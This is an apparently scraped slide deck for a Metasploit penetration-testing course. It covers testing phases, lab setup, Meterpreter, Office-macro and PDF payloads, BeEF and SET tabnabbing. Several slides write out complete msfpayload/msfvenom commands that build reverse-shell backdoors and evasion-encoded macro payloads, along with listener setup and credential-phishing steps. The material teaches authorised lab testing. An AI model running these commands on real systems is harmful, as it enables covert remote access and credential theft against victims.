Published by Julius Tate, modified over 8 years ago
1
Penetration Testing with METASPLOIT
http://www.insectechs.com
I am Chaitanya Krishna. A
2
Course Introduction
3
Course Outline
Introduction to Penetration Testing
Setting up a Penetration Testing Lab
Metasploit 101
Meterpreter
Client Side Attacks
Exploiting Client Side Vulnerabilities
Exploiting Browser Based Vulnerabilities
Social Engineering Toolkit
Armitage
PowerSploit
Post Exploitation
Writing Custom Meterpreter Scripts
4
Introduction to PENETRATION TESTING
5
Introduction to Penetration Testing
"Penetration testing is a method of evaluating the security of a computer system or network by simulating an attack."
Penetration tests are valuable for several reasons:
Determining the feasibility of a particular set of attack vectors
Identifying higher-risk vulnerabilities which could lead to a security breach
Identifying vulnerabilities
Testing the ability of network defenders
Providing evidence to support increased investment in security personnel and technology
6
PTES (Penetration Testing Execution Standard)
Aims to provide security standards for business organizations and security service providers
Lays down a standard for performing penetration tests (Beta)
Phases of the Penetration Testing Execution Standard:
Pre-engagement Interactions
Intelligence Gathering
Threat Modeling
Vulnerability Analysis
Exploitation
Post Exploitation
Reporting
Source: http://www.pentest-standard.org/
7
Pre-Engagement Interactions
Mainly involves client interaction
Engagement interactions
Agenda focuses on the penetration testing road map
Questionnaires
Payment terms
8
Intelligence Gathering
Reconnaissance (information gathering) is the main attribute of a penetration test
Feeds into the other stages of penetration testing
Different tools and scripts are used on different platforms for information gathering
9
Threat Modeling
Depends on the information from intelligence gathering and pre-engagement
Methodology:
Business asset analysis
Business process analysis
Threat agents/community analysis
Threat capability analysis
Motivation modeling
Finding relevant news of comparable organizations being compromised
10
Vulnerability Analysis
Involves discovering flaws in the target system
Different tools and scripts are used for performing vulnerability analysis on different platforms
A threat level classification needs to be created for the exploitation phase
Priority is given by threat level; threats are analyzed and exploited in that order
Directly reflects in the exploitation phase
11
Exploitation
Completely depends on the vulnerability analysis phase and mainly focuses on target exploitation
Exploits the target with an appropriate exploit, after a compatibility check
The pentester needs to evade and bypass security systems and trigger the exploit for successful exploitation
12
Post Exploitation
Involves extending the attack
The pentester can gather further information during post exploitation
Might include sensitive ("juicy") information
Using the post exploitation phase, an attacker can enhance persistence on the compromised system
13
Reporting
Consists of a penetration testing executive summary and a technical report
The executive summary mainly focuses on threat level severity, general findings, recommendation summary and road map
The technical report describes how vulnerability analysis, exploitation and post exploitation were done
Based on the report, the technical team can move on to patch management
14
Setting up PENETRATION TESTING Lab
15
Setting up the Penetration Lab
Focus on creating our own virtual test beds and using third-party ones
Every test bed has multiple vulnerabilities added
Everything stays on the safe side (no loss)
Runs different operating systems with different configurations and added vulnerabilities
16
Lab Setup Overview
17
Virtualization
"Virtualization, in computing, refers to the act of creating a virtual (rather than actual) version of something, including but not limited to a virtual computer hardware platform, operating system (OS), storage device, or computer network resources." -- Wikipedia
Requirements:
Virtualization software (VirtualBox, VMware, a hypervisor)
RAM (minimum 4GB)
Virtual test beds or operating system installer ISO images
A good processor, above 2.8GHz
18
Buzz Words
Host OS: the main operating system installed on the physical computer
Guest OS: any operating system installed using virtualization software
Snapshot: saving the state of a virtual machine
Clone: copying the state of a virtual machine
19
Installing and Setting up Virtual Lab
20
Snapshot and Cloning
21
METASPLOIT 101
22
Metasploit 101
Introduces the Metasploit Framework
Buzzwords, architecture, framework architecture, interfaces and modules
Scope for exploiting target vulnerabilities using built-in exploits and payloads
23
Vulnerability: a weakness in a system which could be compromised
Exploit: code which works on the target's vulnerability
Payload: the actual code that lets an attacker gain access after exploitation
24
Penetration Testing using Metasploit
Used for penetration testing, IDS signature development and exploit development
A buzzword in the security community
Widely used tool for developing and testing exploits for vulnerabilities
25
Why Opt for Metasploit
Widely accepted tool for testing vulnerabilities
Makes complex tasks easier
Possesses a rich set of modules organized in a systematic manner
Has regular updates
Contains 1000+ exploits, 200+ payloads and 500+ auxiliary modules
26
Metasploit Architecture
Libraries: Rex, MSF Core, MSF Base
Interfaces: Console, CLI, Web, GUI (Armitage)
Modules: Payloads, Exploits, Encoders, Post modules, Auxiliary
Tools
Plugins
27
Exploits
Actual code which works on the target's vulnerability
MSF has a modular organization of exploits based on OS and service classification
Exploit Ranking Values:
1. ManualRanking
2. LowRanking
3. AverageRanking
4. NormalRanking
5. GoodRanking
6. GreatRanking
7. ExcellentRanking
Source: https://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
29
Exploit Ranking
1. ManualRanking: the exploit is so unstable or difficult to exploit that it is basically a DoS
2. LowRanking: the exploit is nearly impossible to exploit (under 50% success) for common platforms
3. AverageRanking: the exploit is generally unreliable or difficult to exploit
4. NormalRanking: the exploit is otherwise reliable, but depends on a specific version and can't reliably auto-detect it
5. GoodRanking: the exploit has a default target and it is the "common case" for this type of software
6. GreatRanking: the exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check
7. ExcellentRanking: the exploit will never crash the service
Source: https://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
30
Payloads
Singles: self-contained payloads that do a specific task
Stagers: bridge the connection establishment
Stages: payload components that are downloaded by stager modules
32
Post Exploitation
Critical component of a penetration test
Assists the pentester in gathering information about the exploited system
Enhances the attack in the targeted environment
Can be extended in the pivoting stage
MSF has built-in and external scripts to perform post exploitation
Varies for different OS types
34
Auxiliary Modules
MSF auxiliary modules are a wide variety of modules related to different services, used for doing specific tasks
Types: admin, crawlers, scanners, fuzzers, sniffers, ...
Example: scanning for directories that exist on a web server
36
MSF Tools and Plugins
MSF contains built-in and third-party tools which are widely used during regular pentests
Example: importing a Nessus scan report, which can later be used for launching attacks based on the report
Built-in MSF tools come in handy especially during the post exploitation phase, e.g. memdump
37
MSF Tools
38
MSF Plugins
39
MSF Interfaces
40
Present Scenario
41
If exploit and payload gets executed
42
Meterpreter
43
Meterpreter
44
Meterpreter
It's the default go-to payload for Windows
Provides an enhanced command shell for the attacker
Consists of a default set of core commands
Can be extended at runtime by shipping DLLs to the victim machine
Provides a basic post-exploitation API
Prompt: meterpreter >
45
Working of Meterpreter
Getting a Meterpreter shell goes through 3 stages:
1. The attacker sends the exploit + stage 1 payload
2. The attacker sends the DLL injection payload
3. The Meterpreter DLL starts communication
46
Working with Meterpreter
Covers usage of Meterpreter basics:
Core commands
File system commands
Networking commands
System commands
User interface commands
47
Launching Attack
Stage 1: Creating an executable backdoor
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.206.159 LPORT=44444 X > /var/www/evil.exe
root@kali:# apachectl start
Stage 2: Enabling the listener so the victim connects back to the attacker's machine
root@kali:# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.206.159
msf > set LPORT 44444
msf > exploit
48
Present Scenario
49
If exploit and payload gets executed
50
Core Commands
51
File System Commands
52
Networking Commands
53
System Commands
54
User Interface Commands
55
Client Side Attacks
57
Introduction to Client Side Attacks
Targets exploitation of client side vulnerabilities
Cracks the perimeter from the client side work environment
Includes: Email, Java, Office suite, 3rd party applications, Browsers
Whole agenda focuses on client side exploitation: client side software, exploiting vulnerable services, clients exposed to hostile servers
58
Lab Environment
Contains different sets of operating systems
Preconfigured with added vulnerabilities
Scenario based: different stages, different security levels
Goal is to pwn
59
Agenda
Exploiting:
Software based vulnerabilities
Web based vulnerabilities
Browser based vulnerabilities
60
Introduction to Client Side Attacks
61
Stage -1
62
Stage -1
The attacker creates a backdoor and deploys it on an unprotected system, where:
Anti Virus: absent
Updates: absent
Firewall: absent
63
Stage -1
Stage 1: Creating an executable backdoor
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.206.159 LPORT=44444 X > /var/www/evil.exe
root@kali:# apachectl start
Stage 2: Enabling the listener so the victim connects back to the attacker's machine
root@kali:# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.206.159
msf > set LPORT 44444
msf > exploit
64
Time for Demo Attacker Victim
65
Exploiting Client Side Vulnerabilities
66
Exploiting Client-Side Vulnerabilities
Introduction to MSF payloads
Msfpayload, Msfencode, Msfvenom
Introduction to binary payloads
Creating custom binary payload types
File format exploits
Encoding payloads into VBA code
Exploiting MS-Office suite programs using custom macros
Exploiting Word and PDF documents
Introduction to the Veil framework
Analyzing custom binary payloads using the Veil framework
Porting exploits and exploiting client side vulnerabilities
Making persistent backdoors
67
Introduction to MSF Payloads
MSF contains different payloads with different sets of options
Built in with a custom set of commands
Everything depends on payload flexibility
Focus on exploit development and exploitation on different OS platforms, depending on the vulnerability present
68
Msfpayload, Msfencode, Msfvenom
The msfpayload module is used for creating custom executables and for shellcode generation in different formats
Shellcode generated by msfpayload can contain null characters; shellcode that is deployed or passed over a network might lead to AV / IDS / IPS detection
The msfencode module helps avoid bad characters
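As an added illustration (not part of the course slides), a small Python checker that parses the C-array shellcode dump that msfpayload/msfvenom emit with "-f c" and reports every bad character with its offset, which is the check you run before and after encoding. The sample dump and the default bad-character list are constructed for the example and are not real shellcode.

```python
import re

# Bytes that typically break delivery of raw shellcode: NUL terminates C
# strings, CR/LF end lines in text-based protocols. Constructed default list;
# the real set depends on the vulnerable program and is established per target.
DEFAULT_BAD_CHARS = b"\x00\x0a\x0d"

# Constructed sample in the C-array format of "-f c" output. These bytes are
# NOT real shellcode; two NULs are planted at offsets 4 and 5 and a LF at 10.
SAMPLE_C_OUTPUT = '''unsigned char buf[] =
"\\x31\\xc0\\x50\\x68\\x00\\x00\\x41\\x42"
"\\x89\\xe1\\x0a\\x90";'''


def parse_c_shellcode(text: str) -> bytes:
    """Turn the "\\xNN" escapes of a C-array dump into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def find_bad_chars(shellcode: bytes, bad_chars: bytes = DEFAULT_BAD_CHARS) -> list:
    """Return (offset, byte_value) for every occurrence of a bad character."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad_chars]


def check_shellcode(c_text: str, bad_chars: bytes = DEFAULT_BAD_CHARS) -> dict:
    """Summarise a dump: byte length, bad-char hits, and whether it is clean."""
    code = parse_c_shellcode(c_text)
    hits = find_bad_chars(code, bad_chars)
    return {"length": len(code), "hits": hits, "clean": not hits}


if __name__ == "__main__":
    result = check_shellcode(SAMPLE_C_OUTPUT)
    print(f"{result['length']} bytes, clean={result['clean']}")
    for off, val in result["hits"]:
        print(f"  bad char 0x{val:02x} at offset {off}")
```

The same bad-character list is what you hand to the encoder (msfvenom's -b option) and then re-run the checker on the encoded output to confirm the characters are gone.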
69
Binary Payload
Developed using msfpayload
Requires a bit of social engineering
The attacker needs to create an exe file and send it to the victim machine
On the attacker side a listener should be enabled
Whenever the victim opens the exe, the connection gets established
70
DEMO
Stage 1: Creating an executable backdoor
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.206.159 LPORT=44444 X > /var/www/evil.exe
root@kali:# apachectl start
Stage 2: Enabling the listener so the victim connects back to the attacker's machine
root@kali:# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.206.159
msf > set LPORT 44444
msf > exploit
71
Exploiting File Format Vulnerabilities
A user's desktop environment contains various software applications and networking services
It might contain outdated applications or poorly configured security services
Client side exploitation can be done using any one of the following: Email, Java, Office suite, 3rd party applications, Browsers
72
Exploiting MS-Office Suite Programs
73
Shellcode execution in MS-Office Macros
Stage 1: Creating shellcode + payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.159.132 LPORT=443 -e x86/shikata_ga_nai -i 5 -f vba > vba.txt
Stage 2: Enabling the listener so the victim connects back to the attacker's machine
root@kali:# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.132
msf > set LPORT 443
msf > exploit
74
Exploiting PDF Documents
75
Exploiting PDF Documents
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.132
msf > set LPORT 4444
msf > set INFILENAME /root/password.pdf
msf > exploit
Share the generated PDF file with the victim
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.132
msf > set LPORT 4444
msf > exploit
76
Exploiting Software Based Vulnerabilities
77
Exploiting Software based Vulnerabilities
Introduction to software based vulnerabilities
Analyzing how to exploit a fully patched system
Analyzing and exploiting software vulnerabilities
78
Introduction to software based vulnerabilities
Targets exploitation of client side vulnerabilities
Cracks the perimeter from the client side work environment
Whole agenda focuses on client side exploitation: client side software, exploiting vulnerable services
Source: http://www.exploit-db.com/
79
Analyzing how to exploit fully patched machine
80
Analyzing how to exploit a fully patched machine
Let's check for any vulnerable service running on the victim's machine
We will exploit core software based vulnerabilities
82
Victim Environment
83
Analyzing and Exploiting Vulnerability
85
Exploiting Browser Based Vulnerabilities
86
Exploiting Browser based Vulnerabilities
Introduction to browser based vulnerabilities
Exploiting browser based vulnerabilities using Metasploit
Introduction to the Browser Exploitation Framework (BeEF)
Installing and configuring BeEF on the attacker machine
Exploiting browser based vulnerabilities using BeEF
87
Introduction to Browser Attacks
"A browser exploit is a form of malicious code that takes advantage of a flaw or vulnerability in an operating system or piece of software with the intent to breach browser security to alter a user's browser settings without their knowledge. Malicious code may exploit ActiveX, HTML, images, Java, JavaScript, and other Web technologies and cause the browser to run arbitrary code." -- Wikipedia
88
Exploiting Browser Vulnerabilities using MSF
The user environment might be running an outdated browser
The victim needs to browse to the attacker's shared URL
Once the victim navigates to the attacker's URL, the victim's machine gets exploited and the connection is established
93
Browser Exploitation Framework (BeEF)
Open source tool for testing and exploiting web application and browser-based vulnerabilities
Testing and exploitation are done from the client side
Features:
BeEF's modular framework allows addition of custom browser exploitation commands
The extension API allows users to change BeEF's core behavior
Keystroke logging
Browser proxying
Integration with Metasploit
Plugin detection
Intranet service exploitation
PhoneGap modules
Hooking through QR codes
Social engineering modules that spur user responses such as entering sensitive data and responding to reminders to update software
RESTful API that allows control of BeEF through HTTP requests (JSON format)
Source: http://en.wikipedia.org/wiki/BeEF
94
Browser Exploitation Framework (BeEF) Architecture (diagram © BeEF Project)
95
Installing and Configuring BeEF
Installation:
root@kali: apt-get update
root@kali: apt-get install beef-xss
Configuring:
Edit config.yaml and set Metasploit: true
vi /usr/share/beef-xss/config.yaml
vi /usr/share/beef-xss/extensions/metasploit/config.yaml
Add the Kali Linux IP at lines 18 and 26:
host: "192.168.159.132"
callback_host: "192.168.159.132"
Add the MSF framework path at line 37:
{os: 'custom', path: '/usr/share/metasploit-framework/'}
Launching:
msf > load msgrpc ServerHost=192.168.159.132 Pass=abc123
root@kali: cd /usr/share/beef-xss/
root@kali: ./beef
96
beef
98
Time for Demo
99
Social Engineering Toolkit (S.E.T.)
100
Social Engineering Toolkit
Introduction to social engineering
Introduction to SET
Installing and configuring the Social Engineering Toolkit
Working on SET modules and launching attacks using SET
101
Kevin Mitnick Social Engineering
102
Motivation
Self interest: Mr. X, under pressure from friends, family or organized crime syndicates, acts for reasons such as financial gain, self-interest and/or revenge
Curiosity: Mr. X wants to access and/or modify information that is associated with a family member, colleague or even a neighbor
Revenge: Mr. X targets a friend, colleague, organization or even a total stranger to satisfy the emotional desire for vengeance
103
The Root Cause
People want to be helpful: sometimes the help goes too far and they give away too much information
People want to avoid confrontation: it's difficult for some people to ask others to prove who they are; they don't want confrontation
People like convenience: no one wants to be put out by additional security even though it may benefit the organization
People are messy: by nature, they leave paper around, copy multiple people on e-mail, and leak data
People are curious: a great example is an employee who finds a USB drive in the parking lot; the first thing they do when they get to their desk is plug it in to see what's on it
People appeal to the senses: building a relationship with a sweet voice
104
Life Cycle of Social Engineering
105
Introduction to SET
The Social-Engineer Toolkit (SET) was created and written by Dave Kennedy, the founder of TrustedSec
Focuses on exploiting human weakness
Interfaces: command line, web
106
Introduction to Command-line Interface
107
Introduction to Web Interface
108
Working on SET modules and launching attacks using SET
Tabnabbing attack
Performing a tabnabbing attack using SET
109
Introduction to Tabnabbing
"It can detect that you're logged into Citibank right now and Citibank has been training you to log into your account every 15 minutes because it logs you out for better security. It's like being hit by the wrong end of the sword." -- Aza Raskin, http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
110
Behind the Curtains
The attacker uses customized scripts and a hosting service to make the page look like the original
How it is done: the files on the hosting site are Index-1.html, Index-2.html, Tabnab.js / Script.js, Script.php and Log.txt
111
Tabnabbing using SET
root@kali: cd /usr/share/set/
root@kali: ./setoolkit
1. Social Engineering Attacks
2. Website Attack Vectors
4. Tabnabbing
Enter the attacker's IP
2. Site Cloner
Enter the URL to clone
The victim opens the attacker's URL and switches to a new tab. The tab left in the background gets refreshed and loads the phishing page. If the victim supplies credentials there, they are posted back to the attacker's machine.
115
Captured Credentials
116
Armitage
117
Armitage
Introduction to Armitage
Installing and configuring Armitage
Host management
Dynamic workspaces
Importing hosts
Scanning and exploiting targets
Exploit automation
118
Introduction to Armitage
GUI front-end for the Metasploit Framework, developed by Raphael Mudge
Kali Linux ships with Armitage and all its dependencies
root@kali: service postgresql start
root@kali: service metasploit start
root@kali: armitage
119
Launching Armitage
122
Armitage UI
123
Adding Host
125
Scanning Host
126
Finding Attacks
129
Launching Attack
131
Compromised System
132
Thank You
www.insectechs.com